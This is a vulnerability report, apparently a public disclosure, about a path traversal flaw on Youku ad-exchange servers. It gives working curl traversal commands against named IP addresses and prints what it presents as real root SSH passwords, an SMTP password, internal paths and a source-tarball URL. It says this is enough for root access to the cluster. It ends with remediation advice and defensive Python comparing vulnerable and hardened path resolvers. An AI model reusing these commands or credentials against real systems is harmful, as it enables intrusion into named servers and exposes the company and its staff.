Youku Server File Reading

Source: Internet
Author: User
Tags: email account

Youku Server File Reading and internal information leakage

Several servers in the advertising system are affected by a path traversal vulnerability: an attacker can read arbitrary files, and because the HTTP service runs as root, files such as /etc/shadow and root's shell history are readable as well.

The following servers are affected. Each request below walks out of the web root with ../ segments and reads the network interface configuration ifcfg-eth1, which is a harmless file to use as a probe. Note that curl 7.42 and later squashes ../ segments before sending the request, so add --path-as-is on a current curl to reproduce this.

curl http://220.181.185.228/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.185.229/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.180/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.181/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.202/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.203/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1

Take one of them as an example.

Read /etc/shadow (screenshot not reproduced)

Read the shell history (screenshot not reproduced)

Configuration files located through the history; one of them follows:

# -*- coding: UTF-8 -*-
[auctionserver_default]
# Install root directory
rundir = /opt/workspace/exchange1.2/auctionserver
# mode (prod/dev)
mode = "prod"
# Number of verticles accepting requests
mainCore = 8
# Number of verticles connecting to DSPs
beaconCore = 8
# Domain names of the auction server
serverHosts = ["c.miaozhen.atm.youku.com", "b.miaozhen.atm.youku.com"]
# Port of the auction server
serverPort = 80
# Port of the API opened to the Exchange website
apiPort = 8080
# Default impression-monitoring address
impAddr = "http://n.miaozhen.atm.youku.com/x.gif"
# Default click-monitoring address
clickAddr = "http://n.miaozhen.atm.youku.com/r.gif"
# Key
mzCookieName = "_ysuid"
# Size of the DSP connection pool; with multiple beacons this is effectively multiplied by the number of beacons
clientPoolSize = 100
# Maximum length of the HTTP pipeline queue
clientMaxPipelineSize = 200
clientConnectionTimeout = 300
serverIdleTimeout = 700
# Whether a service timeout is required
needServiceTimeout = "false"
# Special request "miaozhen1234"
isNoticeInPm = "true"
# Check domain, takes priority
isCheckDomain = "true"
isCheckHost = "false"
isCheckToken = "false"
token = "testToken"
#
isYouku = "true"
useIPsClient = "true"
# dmp
isDMP = "false"
dmpHost = "127.0.0.1"
dmpPort = 6379
dmpKey = "YK_"
dmpSep = ","
# Exchange website address
websiteHost = "ingress"
websitePort = 80
websiteIps = ["220.181.154.177", "123.126.99.87", "10.103.20.174"]
websiteHeaderHost = "ingress"
# Registration interface, does not need to be modified
registerApi = "/server/api/addAuction"
# Budget request interface, does not need to be modified
budgetApi = "/pull/api/budget/take"
# Address of the Redis that the auction log is written to, local by default
redisHost = "127.0.0.1"
redisPort = 6379
keyBudget = "exchange_auction_budget_backup"
#
auctionDataDir = "/opt/data/backup/exchange1.2/auctionserver"
# Whether to display system logs
isShowLog = "true"
# Log retention days
logReservedDays = 30
days = ""
budgetPort = 8281
budgetHost = "Hangzhou"
mappingDmpPort = 6380
mappingDmpHost = ""
mappingDspQps = 1
mappingDspUrl = ""
mappingDspId = ""
forwardPath = "/"
forwardPort = 1234
forwardHost = "127.0.0.1"
isForward = "false"
heapSize = 10
# Start and stop scripts
start = bash bin/start.sh
stop = bash bin/stop.sh
check = bash bin/check.sh
restart = bash bin/restart.sh
start_retry = bash bin/start_retry.sh
stop_retry = bash bin/stop_retry.sh
backup = bash bin/backup.sh
# Password of the target machine to install on
# sshpass = "123456"
# SSH port of the target machine
sshport = "1111"

[auctionserver_01]
# User and domain name (IP) of the target machine to install on
node = root@220.181.154.180
sshpass = "ocf(*XzhWt4K"
# Name of the auction server
serverName = "a05.exchange.ad.b28.youku"

[auctionserver_02]
# User and domain name (IP) of the target machine to install on
node = root@220.181.154.181
sshpass = "isC*&7cjpZCW"
# Name of the auction server
serverName = "a06.exchange.ad.b28.youku"

# [auctionserver_03]
# User and domain name (IP) of the target machine to install on
# node = root@220.181.154.183
# sshpass = "wzxJ^#jsQJKv"
# Name of the auction server
# serverName = "a08.exchange.ad.b28.youku"

Note the [auctionserver_01] and [auctionserver_02] sections: they carry the root SSH passwords of the other auction servers, and the default section gives the non-default SSH port 1111, so this single file read is enough for root SSH access to the rest of the cluster.

Some of the key file paths:

/opt/workspace/exchange1.2/reportserver/run/start.sh
/opt/workspace/exchange1.2/reportserver/code/CMakeLists.txt
/opt/workspace/exchange1.2/reportserver/config/mergelog.list
/opt/workspace/exchange1.2/reportserver/config/reportserver.cfg
/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_new_config.ini
/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_config.ini
/opt/workspace/exchange1.2/auctionserver/conf/dsps.txt
/home/zczhao/warn/sendlog.perl
/opt/workspace/exchange1.2/thirdparts/redis-2.4.17/redis.conf
/home/zczhao/cron/reporttab

Crontab entries:

0 2 * * * /home/zczhao/clear/clear_log.sh
0 2 * * * /home/zczhao/clear/clear_bz2.sh
0 2 * * * /home/zczhao/clear/bz2_day.sh >> /home/zczhao/clear/history.log
#*/10 * * * * /home/zczhao/warn/disk_warn.sh
*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/run_dnscache.sh
*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/heartbeat_check.sh
*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/jmap.sh

/opt/data/backup/exchange1.2/reportserver/auction/log/bz2.sh

sendlog.perl contains an internal email account together with its SMTP password:

my $mail_smtp   = 'mail.youku.com';
my $mail_from   = 'systeminformation@youku.com';
my $mail_to     = 'dawei.zhang@youku.com';
my $auth_id     = 'systeminformation';
my $auth_passwd = '111aaaAAA';
my $subject     = "Warn from adExchange13 ($date).";
my $body        = `cat /home/zczhao/warn/warn_log`;

By the way, the source code can also be downloaded; a dated backup tarball of the auction server is reachable through the same traversal:

http://220.181.185.228/.../../opt/workspace/exchange1.2/auctionserver.2014-07-16-07-52-30.tar.gz

Solution:

Filter the request path properly: decode it, normalize away ./ and ../ segments, and reject any request whose resolved path lies outside the web root. In addition, stop running the HTTP service as root, which is what made /etc/shadow and root's history readable, and rotate the SSH and mail passwords exposed in the configuration file and script above.
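As an added example, not code from the original report or from the affected servers, the following Python contrasts the naive file resolution that the traversal above exploits, a common but bypassable "strip ../" fix, and a hardened resolver that confines every request to the web root. The WEBROOT value and all function names are assumptions; only the shape of the probe paths comes from the report.

```python
"""Path traversal: naive, naively filtered, and hardened request resolution.

Added example, not code from the original report. WEBROOT and the function
names are assumptions; the probe strings follow the report's request shape.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed document root; the report does not say where the served files live.
WEBROOT = "/opt/workspace/exchange1.2/auctionserver/www"


def _inside(root: str, path: str) -> bool:
    """True if the normalized path is root itself or below it (boundary-aware prefix)."""
    root = posixpath.normpath(root)
    path = posixpath.normpath(path)
    return path == root or path.startswith(root + "/")


def vulnerable_resolve(webroot: str, request_path: str) -> str:
    """Decode and concatenate, as the affected servers evidently did.

    Each ../ in the request walks one directory above webroot; with the
    service running as root, /etc/shadow is then just another file."""
    return webroot + unquote(request_path)


def naive_filter_resolve(webroot: str, request_path: str) -> str:
    """A common wrong fix: delete the literal "../" once, then decode.

    "....//" turns into "../" after one deletion, and "%2e%2e/" only becomes
    "../" after decoding, so both bypass the filter."""
    return webroot + unquote(request_path.replace("../", ""))


def hardened_resolve(webroot: str, request_path: str) -> Optional[str]:
    """Return the file path for request_path, or None if it leaves webroot.

    Decode twice (catches double encoding), reject NUL bytes, drop the query
    string, normalize relative to the root, then require the result to be
    inside the root. No "../" stripping: normalization resolves it, and a
    component like "...." is just a directory name that will not exist."""
    decoded = unquote(unquote(request_path))
    if "\x00" in decoded:
        return None
    decoded = decoded.split("?", 1)[0]
    root = posixpath.normpath(webroot)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    return candidate if _inside(root, candidate) else None


def escapes_root(webroot: str, path: str) -> bool:
    """Grade a resolver's output: True if it points outside webroot."""
    return not _inside(webroot, path)


if __name__ == "__main__":
    probes = [  # the report's request, two filter bypasses, and a benign request
        "/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1",
        "/....//....//....//....//....//....//etc/shadow",
        "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow",
        "/img/../index.html?v=2",
    ]
    for p in probes:
        print(p)
        for name, fn in (("vulnerable", vulnerable_resolve), ("naive filter", naive_filter_resolve)):
            print(f"  {name:13s}: {'ESCAPES' if escapes_root(WEBROOT, fn(WEBROOT, p)) else 'inside'}")
        print(f"  {'hardened':13s}: {hardened_resolve(WEBROOT, p)}")
```

Running the script grades the three resolvers against the report's request and two filter bypasses. The prefix check here works on the string path only; in a real server, follow hardened_resolve with os.path.realpath and repeat the check, because a symlink inside the web root can still point outside it.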
 
